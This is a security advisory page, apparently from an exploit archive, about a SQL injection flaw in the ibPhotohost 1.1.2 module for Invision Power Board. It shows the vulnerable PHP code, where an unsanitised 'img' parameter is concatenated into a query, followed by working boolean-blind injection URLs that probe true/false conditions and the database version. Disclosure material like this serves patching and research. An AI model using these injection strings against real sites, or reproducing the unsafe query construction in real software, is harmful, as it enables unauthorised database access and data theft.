ibPhotohost 1.1.2 SQL Injection

2010-09-27 / 2010-09-28
Credit: fred777
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

################################################# + + Title: ibPhotohost 1.1.2 SQL Injection + Author: fred777 - [fred777.5x.to] + Link: http://mods.invisionize.com/index.php/f/7609 + Vuln: index.php?autocom=photohost&CODE=04&img=[SQL Injection] + Greetzz to: back2hack,free-hack,hackbase,c-c + Contact: nebelfrost77@googlemail.com + ################################################# --[ Vuln Code ] -- $id = $this->ipsclass->input['img']; $this->ipsclass->DB->simple_construct(array( 'select' => '*', 'from' => 'imgupload', 'where' => 'imgupload_id=' . $id, 'order' => 'imgupload_date asc' )); ################################################ --[ Exploitable ]-- http://site/index.php?autocom=photohost&CODE=04&img=[SQL Injection] http://site/index.php?autocom=photohost&CODE=04&img=1+and+1=1--+ => true http://site/index.php?autocom=photohost&CODE=04&img=1+and+1=0--+ => false http://site/index.php?autocom=photohost&CODE=04&img=1+and+substring(version(),1,1)=5 ################################################

References:

http://www.vupen.com/english/advisories/2010/2437
http://www.securityfocus.com/bid/43374
http://www.exploit-db.com/exploits/15070
http://packetstormsecurity.org/1009-exploits/ibphotohost-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top